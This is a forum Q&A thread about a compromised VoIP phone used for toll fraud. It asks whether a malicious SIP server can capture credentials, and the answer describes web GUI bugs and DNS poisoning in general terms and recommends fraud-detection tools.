To make a long story short, a client phone was compromised and used to make illicit calls. An investigation revealed a port forwarding entry to the phone's web UI, which is "protected" by a 6 digit numeric password. We're assuming this was compromised, and are now trying to figure out how they got an extension password from there (it's not available to the UI, nor is it contained in the config file backups you can retrieve from the web UI.) One thing they can do via the web UI is change the registration server.
I know the password is never sent in clear text, but I think the main purpose of the challenge/response authentication is to ensure that the client is who they say they are, for the server's protection. I don't know how much protection is afforded to the client. So, my question: if an endpoint attempts registration against a malicious SIP server, can that server obtain the SIP credentials?
Attacks against phone sets are a current trend in VoIP hacking. There are well known bugs in web GUI's of phones, that expose their contents (including SIP credentials used to register with the SIP server). As some phone sets are directly attached to the internet it's difficult to protect them. (If on an internal network then the GUI's should not be exposed)
One attack involves DNS poisoning which causes the endpoint to register with a foreign SIP server, and exposes the credentials.
While keeping phone firmware up to date is a good idea, be sure to use a PBX security system which can detect suspicious dialing patterns, unusual number/rate of calls in progress, etc. Simple tools like 'fail2ban' will never catch such an attack. As well, attacks using 'spread IP' make it hard to block unless your VoIP security system can detect them.
Have a look at this voip-info page on security voip-info and some suggestions on ideas and products to detect and block such attacks.